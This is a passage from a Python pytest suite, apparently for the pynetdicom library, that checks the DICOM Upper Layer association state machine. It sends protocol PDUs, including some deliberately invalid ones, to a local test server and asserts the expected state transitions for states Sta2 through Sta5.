# Evt18: ARTIM timer expired from <local service>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:1] == ["Sta2"]
assert fsm._changes[:1] == [
("Sta1", "Evt5", "AE-5"),
]
assert fsm._events[:2] == ["Evt5", "Evt18"]
def test_evt19(self):
"""Test Sta2 + Evt19."""
# Sta2 + Evt19 -> AA-1 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta13"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt19", "AA-1")]
assert fsm._events[:2] == ["Evt5", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState03(TestStateBase):
"""Tests for State 03: Awaiting A-ASSOCIATE (rsp) primitive."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta3")
def test_evt01(self):
"""Test Sta3 + Evt1."""
# Sta3 + Evt1 -> <ignore> -> Sta3
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:2] == [("Sta1", "Evt5", "AE-5"), ("Sta2", "Evt6", "AE-6")]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta3 + Evt2."""
# Sta3 + Evt2 -> <ignore> -> Sta3
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta3 + Evt3."""
# Sta3 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
# Check A-ABORT-RQ sent
pdu = A_ABORT_RQ()
pdu.decode(scp.received[0])
assert pdu.source == 2
assert pdu.reason_diagnostic == 0
# Check local got A-P-ABORT
assert assoc.acse.is_aborted("a-p-abort")
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt3", "AA-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt3"]
def test_evt04(self):
"""Test Sta3 + Evt4."""
# Sta3 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [("send", a_associate_rq), ("send", a_associate_rj), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt4", "AA-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta3 + Evt5."""
# Sta3 + Evt5 -> <ignore> -> Sta3
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta3 + Evt6."""
# Sta3 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [("send", a_associate_rq), ("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
pass
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt6", "AA-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt6"]
def test_evt07(self):
"""Test Sta3 + Evt7."""
# Sta3 + Evt7 -> AE-7 -> Sta6
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
# AE-7: Send A-ASSOCIATE-AC PDU
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:3] == ["Sta2", "Sta3", "Sta6"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt7"]
def test_evt08(self):
"""Test Sta3 + Evt8."""
# Sta3 + Evt8 -> AE-8 -> Sta13
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
# AE-8: Send A-ASSOCIATE-RJ PDU and start ARTIM
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_associate("reject"))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt8", "AE-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt8"]
def test_evt09(self):
"""Test Sta3 + Evt9."""
# Sta3 + Evt9 -> <ignore> -> Sta3
# Evt9: Receive P-DATA primitive from <local user>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_pdata())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:2] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt9"]
def test_evt10(self):
"""Test Sta3 + Evt10."""
# Sta3 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [("send", a_associate_rq), ("send", p_data_tf), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt10", "AA-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt10"]
def test_evt11(self):
"""Test Sta3 + Evt11."""
# Sta3 + Evt11 -> <ignore> -> Sta3
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(False))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:2] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt11"]
def test_evt12(self):
"""Test Sta3 + Evt12."""
# Sta3 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [("send", a_associate_rq), ("send", a_release_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt12", "AA-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt12"]
def test_evt13(self):
"""Test Sta3 + Evt13."""
# Sta3 + Evt13 -> AA-8 -> Sta13
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [("send", a_associate_rq), ("send", a_release_rp), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt13", "AA-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt13"]
def test_evt14(self):
"""Test Sta3 + Evt14."""
# Sta3 + Evt14 -> <ignore> -> Sta3
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_release(True))
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:2] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt14"]
def test_evt15(self):
"""Test Sta3 + Evt15."""
# Sta3 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU, start ARTIM
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
assoc.dul.send_pdu(self.get_abort())
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt15", "AA-1"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt15"]
def test_evt16(self):
"""Test Sta3 + Evt16."""
# Sta3 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [("send", a_associate_rq), ("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt16", "AA-3"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt16"]
def test_evt17(self):
"""Test Sta3 + Evt17."""
# Sta3 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt17", "AA-4"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt17"]
def test_evt18(self):
"""Test Sta3 + Evt18."""
# Sta3 + Evt18 -> <ignore> -> Sta3
# Evt18: ARTIM timer expired from <local service>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:2] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt18"]
def test_evt19(self):
"""Test Sta3 + Evt19."""
# Sta3 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
orig = assoc.acse._negotiate_as_acceptor
def _neg_as_acc():
"""Override ACSE._negotiate_as_acceptor so no A-ASSOCIATE (rsp)."""
# Keep the state machine in Sta3 for 0.5 s
scp.step()
time.sleep(0.5)
orig()
assoc.acse._negotiate_as_acceptor = _neg_as_acc
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
assert fsm._transitions[:2] == ["Sta2", "Sta3"]
assert fsm._changes[:3] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt19", "AA-8"),
]
assert fsm._events[:3] == ["Evt5", "Evt6", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState04(TestStateBase):
"""Tests for State 04: Awaiting TRANSPORT_OPEN from <transport service>."""
def move_to_state(self, assoc, scp):
def connect(address):
"""Override the socket's connect so no event gets added."""
if assoc.dul.socket.socket is None:
assoc.dul.socket.socket = assoc.dul.socket._create_socket()
try:
assoc.dul.socket.socket.connect(address)
assoc.dul.socket._is_connected = True
except (socket.error, socket.timeout) as exc:
assoc.dul.socket.close()
assoc.dul.socket.connect = connect
assoc.start()
self.wait_on_state(assoc.dul.state_machine, "Sta4")
def test_evt01(self):
"""Test Sta4 + Evt1."""
# Sta4 + Evt1 -> <ignore> -> Sta4
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta4 + Evt2."""
# Sta4 + Evt2 -> <ignore> -> Sta4
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta4 + Evt3."""
# Sta4 + Evt3 -> <ignore> -> Sta4
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
commands = [("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt3"]
def test_evt04(self):
"""Test Sta4 + Evt4."""
# Sta4 + Evt4 -> <ignore> -> Sta4
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
commands = [("send", a_associate_rj), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt4"]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta4 + Evt5."""
# Sta4 + Evt5 -> AE-5 -> Sta2
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
# AE-5: Issue TRANSPORT_RESPONSE to <transport service>
# Start ARTIM timer
pass
def test_evt06(self):
"""Test Sta4 + Evt6."""
# Sta4 + Evt6 -> <ignore> -> Sta4
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
commands = [("send", a_associate_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt6"]
def test_evt07(self):
"""Test Sta4 + Evt7."""
# Sta4 + Evt7 -> <ignore> -> Sta4
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt7"]
def test_evt08(self):
"""Test Sta4 + Evt8."""
# Sta4 + Evt8 -> <ignore> -> Sta4
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt8"]
def test_evt09(self):
"""Test Sta4 + Evt9."""
# Sta4 + Evt9 -> <ignore> -> Sta4
# Evt9: Receive P-DATA primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt9"]
def test_evt10(self):
"""Test Sta4 + Evt10."""
# Sta4 + Evt10 -> <ignore> -> Sta4
# Evt10: Receive P-DATA-TF PDU from <remote>
commands = [("send", p_data_tf), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt10"]
def test_evt11(self):
"""Test Sta4 + Evt11."""
# Sta4 + Evt11 -> <ignore> -> Sta4
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt11"]
def test_evt12(self):
"""Test Sta4 + Evt12."""
# Sta4 + Evt12 -> <ignore> -> Sta4
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
commands = [("send", a_release_rq), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt12"]
def test_evt13(self):
"""Test Sta4 + Evt13."""
# Sta4 + Evt13 -> <ignore> -> Sta4
# Evt13: Receive A-RELEASE-RP PDU from <remote>
commands = [("send", a_release_rp), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt13"]
def test_evt14(self):
"""Test Sta4 + Evt14."""
# Sta4 + Evt14 -> <ignore> -> Sta4
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt14"]
def test_evt15(self):
"""Test Sta4 + Evt15."""
# Sta4 + Evt15 -> <ignore> -> Sta4
# Evt15: Receive A-ABORT (rq) primitive from <local user>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt15"]
def test_evt16(self):
"""Test Sta4 + Evt16."""
# Sta4 + Evt16 -> <ignore> -> Sta4
# Evt16: Receive A-ABORT PDU from <remote>
commands = [("send", a_abort), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt16"]
def test_evt17(self):
"""Test Sta4 + Evt17."""
# Sta4 + Evt17 -> <ignore> -> Sta4
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt17"]
def test_evt18(self):
"""Test Sta4 + Evt18."""
# Sta4 + Evt18 -> <ignore> -> Sta4
# Evt18: ARTIM timer expired from <local service>
commands = [("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt18"]
def test_evt19(self):
"""Test Sta4 + Evt19."""
# Sta4 + Evt19 -> <ignore> -> Sta4
# Evt19: Received unrecognised or invalid PDU from <remote>
commands = [("send", b"\x08\x00\x00\x00\x00\x00\x00\x00\x00"), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._transitions[:1] == ["Sta4"]
assert self.fsm._changes[:1] == [
("Sta1", "Evt1", "AE-1"),
]
assert self.fsm._events[:2] == ["Evt1", "Evt19"]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState05(TestStateBase):
"""Tests for State 05: Awaiting A-ASSOCIATE-AC or A-ASSOCIATE-RJ PDU."""
def move_to_state(self, assoc, scp):
assoc.start()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta5")
def test_evt01(self):
"""Test Sta5 + Evt1."""
# Sta5 + Evt1 -> <ignore> -> Sta5
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [("recv", None), ("exit", None)] # recv a-associate-rq
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert self.fsm._changes[:2] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
]
assert self.fsm._transitions[:2] == ["Sta4", "Sta5"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt1"]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta5 + Evt2."""
# Sta5 + Evt2 -> <ignore> -> Sta5
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta5 + Evt3."""
# Sta5 + Evt3 -> AE-3 -> Sta6
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AE-3: Issue A-ASSOCIATE (ac) primitive
commands = [("recv", None), ("send", a_associate_ac), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
]
assert self.fsm._transitions[:3] == ["Sta4", "Sta5", "Sta6"]
assert self.fsm._events[:3] == ["Evt1", "Evt2", "Evt3"]
def test_evt04(self):
"""Test Sta5 + Evt4."""
# Sta5 + Evt4 -> AE-4 -> Sta1
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AE-4: Issue A-ASSOCIATE (rj) primitive
commands = [("recv", None), ("send", a_associate_rj), ("exit", None)]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:3] == [
("Sta1", "Evt1", "AE-1"),
